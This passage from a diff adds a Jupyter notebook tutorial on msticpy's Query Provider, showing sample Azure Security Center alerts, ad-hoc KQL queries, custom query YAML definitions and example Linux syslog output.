+       "3  [\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...  Azure Security Center   \n",
+       "4  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "\n",
+       "  ProductComponentName           Type CompromisedEntity  \n",
+       "0                       SecurityAlert                    \n",
+       "1                       SecurityAlert                    \n",
+       "2                       SecurityAlert                    \n",
+       "3                       SecurityAlert                    \n",
+       "4                       SecurityAlert                    \n",
+       "\n",
+       "[5 rows x 30 columns]"
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "qry_prov.SecurityAlert.list_alerts(query_times)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='run_adhoc'></a>\n",
+    "###  Running an ad-hoc query\n",
+    "It is also possible to run ad-hoc queries via a similar method. Rather than calling a named query from the Query Provider query store, we can pass a query directly to our Query Provider with <code>QUERY_PROVIDER.exec_query(query=QUERY_STRING)</code>. This will execute the query string passed in the parameters with the driver contained in the Query Provider and return data in a Pandas DataFrame. As with predefined queries an exception will be raised should the query fail to execute.\n",
+    "\n",
+    "    query(self, query: str) -> Union[pd.DataFrame, Any]:\n",
+    "        Execute query string and return DataFrame of results.\n",
+    "\n",
+    "        Parameters\n",
+    "        ----------\n",
+    "        query : str\n",
+    "            The kql query to execute\n",
+    "\n",
+    "        Returns\n",
+    "        -------\n",
+    "        Union[pd.DataFrame, results.ResultSet]\n",
+    "            A DataFrame (if successful) or\n",
+    "            Kql ResultSet if an error."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>DisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>AlertSeverity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>Type</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 06:35:13</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Although none of them succeeded, some of them ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>8af9954d-f28d-40ff-a079-d9d4cc5a5268</td>\n",
+       "      <td>2518385291989119899_8af9954d-f28d-40ff-a079-d9...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[\\r\\n  \"1. Enforce the use of strong passwords...</td>\n",
+       "      <td>{\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 06:35:13</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Although none of them succeeded, some of them ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>8af9954d-f28d-40ff-a079-d9d4cc5a5268</td>\n",
+       "      <td>5d60fff6-7dd2-4474-a4d0-4c8e3fa6fad6</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[\\r\\n  \"1. Enforce the use of strong passwords...</td>\n",
+       "      <td>{\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 07:02:42</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>ba07c315-0af5-4568-9ecd-6c788f9267ae</td>\n",
+       "      <td>b7adb73b-0778-4929-b46a-c0ed642bc61f</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[\\r\\n  \"1. Review the IP addresses and determi...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-26 06:03:16</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>c3144593-9bae-448e-87dd-b2d3c47de571</td>\n",
+       "      <td>d89ad3b2-f7a7-4cff-b8a4-3f6fa58b4760</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[\\r\\n  \"1. Review the IP addresses and determi...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"22\",\\r\\n  \"Protoco...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-06-27 00:31:35</td>\n",
+       "      <td>Security incident with shared process detected</td>\n",
+       "      <td>Security incident with shared process detected</td>\n",
+       "      <td>High</td>\n",
+       "      <td>The incident which started on 2019-06-25 21:24...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>be88b671-2572-4373-af4a-323849b1da1d</td>\n",
+       "      <td>2518408029550429999_be88b671-2572-4373-af4a-32...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>[\\r\\n  \"1. Escalate the alert to the informati...</td>\n",
+       "      <td>{\\r\\n  \"isincident\": \"true\",\\r\\n  \"Detected Ti...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DisplayNam...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 29 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId       TimeGenerated  \\\n",
+       "0  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 06:35:13   \n",
+       "1  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 06:35:13   \n",
+       "2  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 07:02:42   \n",
+       "3  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-26 06:03:16   \n",
+       "4  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-06-27 00:31:35   \n",
+       "\n",
+       "                                         DisplayName  \\\n",
+       "0                 Suspicious authentication activity   \n",
+       "1                 Suspicious authentication activity   \n",
+       "2  Traffic from unrecommended IP addresses was de...   \n",
+       "3  Traffic from unrecommended IP addresses was de...   \n",
+       "4     Security incident with shared process detected   \n",
+       "\n",
+       "                                           AlertName AlertSeverity  \\\n",
+       "0                 Suspicious authentication activity        Medium   \n",
+       "1                 Suspicious authentication activity        Medium   \n",
+       "2  Traffic from unrecommended IP addresses was de...           Low   \n",
+       "3  Traffic from unrecommended IP addresses was de...           Low   \n",
+       "4     Security incident with shared process detected          High   \n",
+       "\n",
+       "                                         Description  \\\n",
+       "0  Although none of them succeeded, some of them ...   \n",
+       "1  Although none of them succeeded, some of them ...   \n",
+       "2  Azure security center has detected incoming tr...   \n",
+       "3  Azure security center has detected incoming tr...   \n",
+       "4  The incident which started on 2019-06-25 21:24...   \n",
+       "\n",
+       "                ProviderName VendorName                      VendorOriginalId  \\\n",
+       "0                  Detection  Microsoft  8af9954d-f28d-40ff-a079-d9d4cc5a5268   \n",
+       "1                  Detection  Microsoft  8af9954d-f28d-40ff-a079-d9d4cc5a5268   \n",
+       "2  AdaptiveNetworkHardenings  Microsoft  ba07c315-0af5-4568-9ecd-6c788f9267ae   \n",
+       "3  AdaptiveNetworkHardenings  Microsoft  c3144593-9bae-448e-87dd-b2d3c47de571   \n",
+       "4                  Detection  Microsoft  be88b671-2572-4373-af4a-323849b1da1d   \n",
+       "\n",
+       "                                       SystemAlertId  ...  \\\n",
+       "0  2518385291989119899_8af9954d-f28d-40ff-a079-d9...  ...   \n",
+       "1               5d60fff6-7dd2-4474-a4d0-4c8e3fa6fad6  ...   \n",
+       "2               b7adb73b-0778-4929-b46a-c0ed642bc61f  ...   \n",
+       "3               d89ad3b2-f7a7-4cff-b8a4-3f6fa58b4760  ...   \n",
+       "4  2518408029550429999_be88b671-2572-4373-af4a-32...  ...   \n",
+       "\n",
+       "                                    RemediationSteps  \\\n",
+       "0  [\\r\\n  \"1. Enforce the use of strong passwords...   \n",
+       "1  [\\r\\n  \"1. Enforce the use of strong passwords...   \n",
+       "2  [\\r\\n  \"1. Review the IP addresses and determi...   \n",
+       "3  [\\r\\n  \"1. Review the IP addresses and determi...   \n",
+       "4  [\\r\\n  \"1. Escalate the alert to the informati...   \n",
+       "\n",
+       "                                  ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...   \n",
+       "1  {\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...   \n",
+       "2  {\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...   \n",
+       "3  {\\r\\n  \"Destination Port\": \"22\",\\r\\n  \"Protoco...   \n",
+       "4  {\\r\\n  \"isincident\": \"true\",\\r\\n  \"Detected Ti...   \n",
+       "\n",
+       "                                            Entities SourceSystem  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...    Detection   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...    Detection   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DisplayNam...    Detection   \n",
+       "\n",
+       "                WorkspaceSubscriptionId  WorkspaceResourceGroup  \\\n",
+       "0  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "1  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "2                                                                 \n",
+       "3                                                                 \n",
+       "4  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "\n",
+       "                                       ExtendedLinks            ProductName  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...  Azure Security Center   \n",
+       "1  [\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...  Azure Security Center   \n",
+       "2  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "3  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "4                                                     Azure Security Center   \n",
+       "\n",
+       "  ProductComponentName           Type  \n",
+       "0                       SecurityAlert  \n",
+       "1                       SecurityAlert  \n",
+       "2                       SecurityAlert  \n",
+       "3                       SecurityAlert  \n",
+       "4                       SecurityAlert  \n",
+       "\n",
+       "[5 rows x 29 columns]"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "test_query = '''\n",
+    "    SecurityAlert\n",
+    "    | take 5\n",
+    "    '''\n",
+    "\n",
+    "query_test = qry_prov.exec_query(query=test_query)\n",
+    "query_test.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='new'></a>\n",
+    "### Creating a new set of queries\n",
+    "msticpy provides a number of pre-defined queries to call with using the data package. You can also add in additional queries to be imported and used by your Query Provider, these are defined in YAML format files and examples of these files can be found at the msticpy GitHub site https://github.com/microsoft/msticpy/tree/master/msticpy/data/queries. \n",
+    "\n",
+    "The required structure of these query definition files is as follows:\n",
+    "- metadata\n",
+    "    - version: The version number of the definition file\n",
+    "    - description: A description of the purpose of this collection of query definitions\n",
+    "    - data_environments[]: A list of the Data Environments that the defined queries can be run against (1 or more)\n",
+    "    - data_families[]: A list of Data Families the defined queries related to, these families are defined as part of msticpy.data.query_defns\n",
+    "    - tags[]: A list of tags to help manage definition files\n",
+    "- defaults: A set of defaults that apply to all queries in the file\n",
+    "    - metadata: Metadata regarding a query\n",
+    "        - data_source: The data source to be used for the query\n",
+    "    - parameters: Parameters to be passed to the query\n",
+    "        - name: The parameter name\n",
+    "        - description: A description of what the parameter is\n",
+    "        - type: The data type of the parameter\n",
+    "        - default: The default value for that parameter\n",
+    "- sources: a set of queries\n",
+    "    - name: The name of the query\n",
+    "        -description: A description of the query's function\n",
+    "        -metadata: Any metadata associated with the query\n",
+    "        -args: The arguments of the query\n",
+    "            -query: The query to be executed\n",
+    "            -uri: A URI associated with the query\n",
+    "        -parameters: Any parameters required by the query not covered by defaults\n",
+    "            - name: The parameter name\n",
+    "            - description: A description of what the parameter is\n",
+    "            - type: The data type of the parameter\n",
+    "            - default: The default value for that parameter\n",
+    "            \n",
+    "\n",
+    "There are also a number of tools within the package to assist in validating new query definition files once created.\n",
+    "    \n",
+    "    data_query_reader.find_yaml_files\n",
+    "        \n",
+    "        Return iterable of yaml files found in `source_path`.\n",
+    "\n",
+    "        Parameters\n",
+    "        ----------\n",
+    "        source_path : str\n",
+    "            The source path to search in.\n",
+    "        recursive : bool, optional\n",
+    "            Whether to recurse through subfolders.\n",
+    "            By default False\n",
+    "\n",
+    "        Returns\n",
+    "        -------\n",
+    "        Iterable[str]\n",
+    "            File paths of yaml files found.\n",
+    "            \n",
+    "     data_query_reader.validate_query_defs\n",
+    "         \n",
+    "         Validate content of query definition.\n",
+    "\n",
+    "        Parameters\n",
+    "        ----------\n",
+    "        query_def_dict : dict\n",
+    "            Dictionary of query definition yaml file contents.\n",
+    "\n",
+    "        Returns\n",
+    "        -------\n",
+    "        bool\n",
+    "            True if validation succeeds.\n",
+    "\n",
+    "        Raises\n",
+    "        ------\n",
+    "        ValueError\n",
+    "            The validation failure reason is returned in the\n",
+    "            exception message (arg[0])\n",
+    "\n",
+    "<code>validate_query_defs()</code> does not perform comprehensive checks on the file but does check key elements required in the file are present."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      " C:\\queries\\example.yaml is a valid query definition\n"
+     ]
+    }
+   ],
+   "source": [
+    "for file in QueryReader.find_yaml_files(source_path=\"C:\\\\queries\"):\n",
+    "    with open(file) as f_handle:\n",
+    "        yaml_file = yaml.safe_load(f_handle)\n",
+    "        if QueryReader.validate_query_defs(query_def_dict = yaml_file) == True:\n",
+    "            print(f' {file} is a valid query definition')\n",
+    "        else:\n",
+    "            print(f'There is an error with {file}')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='add_new'></a>\n",
+    "### Adding a new set of queries and running them\n",
+    "Once you are happy with a query definition file then you import it with <code>QUERY_PROVIDER.import_query_file(query_file=PATH_TO_QUERY_FILE)</code>\n",
+    "This will load the query file into the Query Provider's Query Store from where it can be called."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "qry_prov.import_query_file(query_file='C:\\queries\\example.yaml')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once imported the queries in the files appear in the Query Provider's Query Store alongside the others and can be called in the same manner as pre-defined queries.\n",
+    "\n",
+    "If you have created a large number of query definition files and you want to have the automatically imported into a Query Provider's query store at initialization you can specify a directory containing these queries in the msticpyconfig.yaml file under QueryDefinitions: Custom: \n",
+    "\n",
+    "For example if I have a folder at C:\\queries I will set the config file to:\n",
+    "\n",
+    " QueryDefinitions:\n",
+    "  Default: \"queries\"\n",
+    "  Custom: \n",
+    "    - \"C:\\\\queries\"\n",
+    "    - \"C:\\\\queries2 \n",
+    "\n",
+    " \n",
+    "Having the Custom field populated will mean the Query Provider will automatically enumerate all the YAML files in the directory provided and automatically import he relevant queries into the query store at initialization alongside the default queries. Custom queries with the same name as default queries will overwrite default queries."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "LinuxSyslog.all_syslog\n",
+      "LinuxSyslog.cron_activity\n",
+      "LinuxSyslog.squid_activity\n",
+      "LinuxSyslog.sudo_activity\n",
+      "LinuxSyslog.syslog_example\n",
+      "LinuxSyslog.user_group_activity\n",
+      "LinuxSyslog.user_logon\n",
+      "SecurityAlert.get_alert\n",
+      "SecurityAlert.list_alerts\n",
+      "SecurityAlert.list_alerts_counts\n",
+      "SecurityAlert.list_alerts_for_ip\n",
+      "SecurityAlert.list_related_alerts\n",
+      "WindowsSecurity.get_host_logon\n",
+      "WindowsSecurity.get_parent_process\n",
+      "WindowsSecurity.get_process_tree\n",
+      "WindowsSecurity.list_host_logon_failures\n",
+      "WindowsSecurity.list_host_logons\n",
+      "WindowsSecurity.list_host_processes\n",
+      "WindowsSecurity.list_hosts_matching_commandline\n",
+      "WindowsSecurity.list_matching_processes\n",
+      "WindowsSecurity.list_processes_in_session\n"
+     ]
+    }
+   ],
+   "source": [
+    "queries = qry_prov.list_queries()\n",
+    "for query in queries:\n",
+    "    print(query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Query:  syslog_example\n",
+      "Data source:  LogAnalytics\n",
+      "Example query\n",
+      "\n",
+      "Parameters\n",
+      "----------\n",
+      "add_query_items: str (optional)\n",
+      "    Additional query clauses\n",
+      "end: datetime\n",
+      "    Query end time\n",
+      "host_name: str\n",
+      "    Hostname to query for\n",
+      "query_project: str (optional)\n",
+      "    Column project statement\n",
+      "    (default value is:  | project TenantId, Computer, Facility, TimeGener...)\n",
+      "start: datetime\n",
+      "    Query start time\n",
+      "subscription_filter: str (optional)\n",
+      "    Optional subscription/tenant filter expression\n",
+      "    (default value is: true)\n",
+      "table: str (optional)\n",
+      "    Table name\n",
+      "    (default value is: Syslog)\n",
+      "Query:\n",
+      " {table} | where {subscription_filter} | where TimeGenerated >= datetime({start}) | where TimeGenerated <= datetime({end}) | where Computer == \"{host_name}\" | take 5\n"
+     ]
+    }
+   ],
+   "source": [
+    "qry_prov.LinuxSyslog.syslog_example('?')"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>EventTime</th>\n",
+       "      <th>Facility</th>\n",
+       "      <th>HostName</th>\n",
+       "      <th>SeverityLevel</th>\n",
+       "      <th>SyslogMessage</th>\n",
+       "      <th>ProcessID</th>\n",
+       "      <th>HostIP</th>\n",
+       "      <th>ProcessName</th>\n",
+       "      <th>MG</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>_ResourceId</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>Linux</td>\n",
+       "      <td>2019-07-25 15:15:37.213</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>2019-07-25 15:15:37</td>\n",
+       "      <td>authpriv</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>notice</td>\n",
+       "      <td>omsagent : TTY=unknown   PWD=/opt/microsoft/om...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>10.0.1.4</td>\n",
+       "      <td>sudo</td>\n",
+       "      <td>00000000-0000-0000-0000-000000000002</td>\n",
+       "      <td>Syslog</td>\n",
+       "      <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>Linux</td>\n",
+       "      <td>2019-07-25 15:15:37.313</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>2019-07-25 15:15:37</td>\n",
+       "      <td>authpriv</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>info</td>\n",
+       "      <td>pam_unix(sudo:session): session opened for use...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>10.0.1.4</td>\n",
+       "      <td>sudo</td>\n",
+       "      <td>00000000-0000-0000-0000-000000000002</td>\n",
+       "      <td>Syslog</td>\n",
+       "      <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>Linux</td>\n",
+       "      <td>2019-07-25 15:15:37.917</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>2019-07-25 15:15:37</td>\n",
+       "      <td>authpriv</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>info</td>\n",
+       "      <td>pam_unix(sudo:session): session closed for use...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>10.0.1.4</td>\n",
+       "      <td>sudo</td>\n",
+       "      <td>00000000-0000-0000-0000-000000000002</td>\n",
+       "      <td>Syslog</td>\n",
+       "      <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>Linux</td>\n",
+       "      <td>2019-07-25 15:15:50.793</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>2019-07-25 15:15:50</td>\n",
+       "      <td>authpriv</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>info</td>\n",
+       "      <td>pam_unix(cron:session): session closed for use...</td>\n",
+       "      <td>29486.0</td>\n",
+       "      <td>10.0.1.4</td>\n",
+       "      <td>CRON</td>\n",
+       "      <td>00000000-0000-0000-0000-000000000002</td>\n",
+       "      <td>Syslog</td>\n",
+       "      <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>Linux</td>\n",
+       "      <td>2019-07-25 15:16:01.800</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>2019-07-25 15:16:01</td>\n",
+       "      <td>authpriv</td>\n",
+       "      <td>UbuntuDevEnv</td>\n",
+       "      <td>info</td>\n",
+       "      <td>pam_unix(cron:session): session opened for use...</td>\n",
+       "      <td>29844.0</td>\n",
+       "      <td>10.0.1.4</td>\n",
+       "      <td>CRON</td>\n",
+       "      <td>00000000-0000-0000-0000-000000000002</td>\n",
+       "      <td>Syslog</td>\n",
+       "      <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId SourceSystem           TimeGenerated  \\\n",
+       "0  b1315f05-4a7a-45b4-811f-73e715f7c122        Linux 2019-07-25 15:15:37.213   \n",
+       "1  b1315f05-4a7a-45b4-811f-73e715f7c122        Linux 2019-07-25 15:15:37.313   \n",
+       "2  b1315f05-4a7a-45b4-811f-73e715f7c122        Linux 2019-07-25 15:15:37.917   \n",
+       "3  b1315f05-4a7a-45b4-811f-73e715f7c122        Linux 2019-07-25 15:15:50.793   \n",
+       "4  b1315f05-4a7a-45b4-811f-73e715f7c122        Linux 2019-07-25 15:16:01.800   \n",
+       "\n",
+       "       Computer           EventTime  Facility      HostName SeverityLevel  \\\n",
+       "0  UbuntuDevEnv 2019-07-25 15:15:37  authpriv  UbuntuDevEnv        notice   \n",
